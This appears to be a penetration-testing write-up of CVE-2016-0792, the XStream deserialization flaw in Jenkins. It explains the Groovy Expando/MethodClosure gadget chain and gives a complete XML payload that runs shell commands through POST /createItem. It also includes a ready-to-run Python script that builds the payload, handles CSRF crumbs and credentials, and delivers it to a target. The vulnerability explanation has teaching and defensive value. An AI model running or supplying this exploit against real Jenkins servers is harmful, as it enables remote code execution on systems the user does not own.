
Xstream Vulnerability in Jenkins (CVE-2016-0792)

CVE-2016-0792 (Jenkins advisory SECURITY-247, fixed in Jenkins 1.650 and LTS 1.642.2) is a remote code execution vulnerability caused by unsafe deserialization of user-supplied XML with XStream. Several Jenkins HTTP endpoints, /createItem among them, accept an XML body and hand it to XStream without restricting which classes may be instantiated, so anyone allowed to POST to such an endpoint (Job/Create permission in the case of /createItem, which loosely configured instances grant to anonymous users) can execute arbitrary code on the server.

Root Cause

  • Jenkins uses XStream to deserialize XML (job configuration, remote API bodies) into Java objects.
  • The XML sent to these endpoints is user-controlled and was deserialized without a strict class whitelist, so any class on the classpath could be instantiated.
  • Jenkins bundles Groovy, whose runtime classes (groovy.util.Expando, org.codehaus.groovy.runtime.MethodClosure) make convenient gadgets.
  • Rebuilding a HashMap means calling put() for every entry, which calls hashCode() on the key; Expando.hashCode() delegates to a Closure stored under the property name "hashCode" if one exists, so code runs implicitly while the object graph is still being deserialized.
  • A MethodClosure that points at java.lang.ProcessBuilder.start() turns that implicit call into an OS command.

The result is remote code execution for any user who can reach one of these endpoints; on instances where anonymous users hold the required permission it is unauthenticated.


Vulnerability Chain

  1. Attacker submits a crafted XML body to an endpoint such as /createItem
  2. Jenkins deserializes it via XStream without class restrictions
  3. A groovy.util.Expando holding a MethodClosure under the property "hashCode" is instantiated as the key of a map entry
  4. Inserting that key into the map calls Expando.hashCode(), which calls the closure, i.e. ProcessBuilder.start()
  5. The OS command runs with the privileges of the Jenkins process

Exploit

Groovy-based gadget chain using Expando + MethodClosure:

Create a new item and click OK:

TODO image

Then intercept the resulting POST /createItem request in your proxy:

TODO image

Then use the payload below for RCE:

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>/bin/sh</string>
                <string>-c</string>
                <string>id</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

In this request:

  • The body is the XML above and must be sent with Content-Type: application/xml, otherwise Jenkins does not treat the body as a config to deserialize.
  • The name query parameter is mandatory for /createItem; any item name that does not already exist works.
  • If CSRF protection is enabled, a valid crumb header (from /crumbIssuer/api/json, tied to the same session) has to be added, and the request must carry the session cookie or credentials of a user with Job/Create permission.

POST /createItem?name=test HTTP/1.1
Host: jenkins.local
Content-Type: application/xml
Content-Length: ...

[payload]

  • Deserialization occurs automatically as soon as Jenkins parses the body.
  • The command executes while XStream inserts the Expando key into the map, i.e. during object construction and before any validation of the item.

Info: an error response, even a 500 Internal Server Error page, is a good sign. Expando.hashCode() casts the closure's return value (a java.lang.Process) to Integer, so the request fails with an exception after ProcessBuilder.start() has already executed and no item is created.
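As an added example (not code from the original write-up or from the Jenkins project), the Python script below automates the procedure above end to end: it builds the same Expando/MethodClosure payload with ElementTree so that a command containing <, > or & is escaped correctly, fetches a CSRF crumb when the instance issues one, and POSTs the result to /createItem under a random item name. The target URL, credentials and item-name prefix are placeholders, and it treats a 500 response as the success indicator described in the note above.

```python
"""Send the Expando/MethodClosure gadget to a Jenkins /createItem endpoint.

Added example; not code from the original write-up or from Jenkins.
The target URL, credentials and item-name prefix are placeholders.
"""
import base64
import json
import secrets
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

EXPANDO = "groovy.util.Expando"
METHOD_CLOSURE = "org.codehaus.groovy.runtime.MethodClosure"


def build_payload(argv):
    """Return the gadget XML for ProcessBuilder(argv).start().

    The Expando is the *key* of the map entry: when XStream rebuilds the
    HashMap it calls put(), which calls Expando.hashCode(); Expando finds
    a Closure stored under the property name "hashCode" and calls it,
    and that MethodClosure is start() on the ProcessBuilder owner.
    """
    root = ET.Element("map")
    entry = ET.SubElement(root, "entry")
    expando = ET.SubElement(entry, EXPANDO)
    props = ET.SubElement(expando, "expandoProperties")
    prop = ET.SubElement(props, "entry")
    ET.SubElement(prop, "string").text = "hashCode"
    closure = ET.SubElement(prop, METHOD_CLOSURE)
    ET.SubElement(closure, "delegate", {"class": EXPANDO})
    owner = ET.SubElement(closure, "owner", {"class": "java.lang.ProcessBuilder"})
    command = ET.SubElement(owner, "command")
    for arg in argv:
        ET.SubElement(command, "string").text = arg  # <, > and & are escaped here
    ET.SubElement(closure, "method").text = "start"
    ET.SubElement(entry, "int").text = "1"  # map value; irrelevant to the chain
    return ET.tostring(root, encoding="unicode")


def extract_command(xml_text):
    """Parse a payload back and return its argv (used to check escaping)."""
    node = ET.fromstring(xml_text)
    for tag in ("entry", EXPANDO, "expandoProperties", "entry",
                METHOD_CLOSURE, "owner", "command"):
        node = node.find(tag)
        if node is None:
            raise ValueError(f"payload is missing <{tag}>")
    return [s.text for s in node.findall("string")]


def _request(opener, url, headers, body=None):
    """GET (or POST when a body is given); return (status, response bytes)."""
    req = urllib.request.Request(url, data=body, headers=headers,
                                 method="POST" if body is not None else "GET")
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:  # 4xx/5xx still carry a useful body
        return exc.code, exc.read()


def deliver(base_url, argv, username=None, password=None):
    """POST the gadget to /createItem and return the HTTP status.

    500 is the expected result when the command ran: Expando.hashCode()
    casts the closure's return value (a java.lang.Process) to Integer and
    throws ClassCastException after ProcessBuilder.start() has executed.
    """
    # Keep the session cookie: a Jenkins crumb is bound to the session.
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
    headers = {}
    if username is not None:  # /createItem needs Job/Create; anonymous may hold it
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        headers["Authorization"] = "Basic " + token
    status, body = _request(opener, base_url + "/crumbIssuer/api/json", headers)
    if status == 200:  # CSRF protection enabled: add the crumb header
        crumb = json.loads(body)
        headers[crumb["crumbRequestField"]] = crumb["crumb"]
    headers["Content-Type"] = "application/xml"
    item = "item-" + secrets.token_hex(4)  # placeholder; any unused name works
    status, _ = _request(opener, f"{base_url}/createItem?name={item}",
                         headers, build_payload(argv).encode())
    return status


if __name__ == "__main__":
    # python3 xstream_jenkins.py http://jenkins.local:8080 [user] [password]
    target = sys.argv[1].rstrip("/")
    user, pw = (sys.argv[2], sys.argv[3]) if len(sys.argv) >= 4 else (None, None)
    code = deliver(target, ["/bin/sh", "-c", "id"], user, pw)
    print(f"HTTP {code} ({'likely executed' if code == 500 else 'check manually'})")
```

Building the XML with ElementTree rather than string formatting matters once the command stops being `id`: a redirect or a shell pipeline pasted raw into `<string>` would break the XStream parse before any deserialization happens, whereas the escaped form round-trips cleanly.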